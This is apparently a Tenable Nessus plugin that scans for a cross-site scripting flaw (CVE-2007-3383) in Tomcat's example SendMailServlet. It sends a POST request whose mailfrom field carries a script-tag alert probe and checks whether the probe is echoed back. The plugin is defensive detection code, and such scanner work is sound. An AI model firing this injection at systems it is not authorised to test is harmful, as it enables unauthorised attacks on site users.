#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(25995);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2007-3383");
  script_bugtraq_id(24999);
  script_xref(name:"OSVDB", value:"39000");

  script_name(english:"Tomcat SendMailServlet Sample App Cross-Site Scripting Vulnerability");
  script_summary(english:"Checks for an XSS flaw in a sample app from Tomcat");

  desc = "
Synopsis :

The remote web server contains a JSP application that is affected by a
cross-site scripting vulnerability. 

Description :

The remote web server includes an example JSP application that fails
to sanitize user-supplied input before using it to generate dynamic
content in the 'examples/SendMailServlet' servlet.  An unauthenticated
remote attacker may be able to leverage this issue to inject arbitrary
HTML or script code into a user's browser to be executed within the
security context of the affected site. 

See also :

http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0448.html

Solution :

Undeploy the Tomcat examples web application. 

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 8080);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_kb_item("Services/www");
if (!port) port = 8080;
if (!get_port_state(port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


# Unless we're paranoid, make sure the banner looks like Tomcat.
if (report_paranoia < 2)
{
  banner = get_http_banner(port:port);
  if (!banner || "Server: Apache-Coyote" >!< banner) exit(0);
}


# Make sure the affected script exists.
url = "/examples/SendMailServlet";
req = http_get(item:url, port:port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# If it does...
if ("HTTP Status 405 - HTTP method GET is not supported" >< res)
{
  # Send a request to exploit the flaw.
  xss = raw_string("<script>alert(", SCRIPT_NAME, ")</script>");
  postdata = string(
    "mailfrom=", urlencode(str:xss), "&",
    "mailto=&",
    "mailsubject=&",
    "mailcontent="
  );
  req = string(
    "POST ", url, " HTTP/1.1\r\n",
    "Host: ", get_host_name(), "\r\n",
    "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
    "Content-Type: application/x-www-form-urlencoded\r\n",
    "Content-Length: ", strlen(postdata), "\r\n",
    "\r\n",
    postdata
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if our exploit appears in the exception message.
  if (string("Extra route-addr in string ``", xss, "'' at") >< res)
    security_warning(port);
}
